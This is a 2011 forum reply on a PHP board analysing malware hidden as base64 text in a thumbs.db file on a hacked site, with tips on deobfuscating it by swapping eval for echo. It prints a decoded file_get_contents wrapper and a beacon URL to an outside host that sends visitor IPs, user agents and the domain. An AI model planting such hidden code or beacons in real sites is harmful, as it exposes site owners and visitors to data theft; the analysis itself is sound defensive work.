作者mervynW (.)
看板PHP
标题Re: [请益] php 网站被植入密文 base64_decode
时间Mon Oct 3 11:43:17 2011
※ 引述《kidbaby (幸福的进行式)》之铭言:
: 这阵子感觉网站很慢
: 研究了一下
: 发现了 不认识的档案 .htaccess 联结了 thumbs.db
: 里头竟然不是我想像中的图片?
: 而是base64加密的密文
先解到这边. 建议你. passwd 全换一换吧
function evaloPoIEXQacJTquN($s) {return @file_get_contents($s);}
他老兄要抓你的local file 都没问题啦.
DB 应该也被趴走了吧 (茶)
要找这种code最快的就是从 eval replace echo.
cp 2~3次就可以看到他的code了.
eval 拿掉也没办法执行 (茶), 所以变无害的 code
解到最後, 这家伙还没那麽坏嘛.
file_get_contents ::
http://cacacacacacacacacaca.ca/in.php?
i=CLIENT_IP
&b=USER_AGENT
&h=DOMAIN_NAME
最终结果是,知道你网站流量,分析你网站值不值的攻击
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 122.147.158.247
※ 编辑: mervynW 来自: 122.147.158.247 (10/03 11:57)
※ 编辑: mervynW 来自: 122.147.158.247 (10/03 12:05)
1F:→ MOONRAKER:我看他把一个"ca"用for重覆10次就看不懂了 原来是这样 10/03 12:09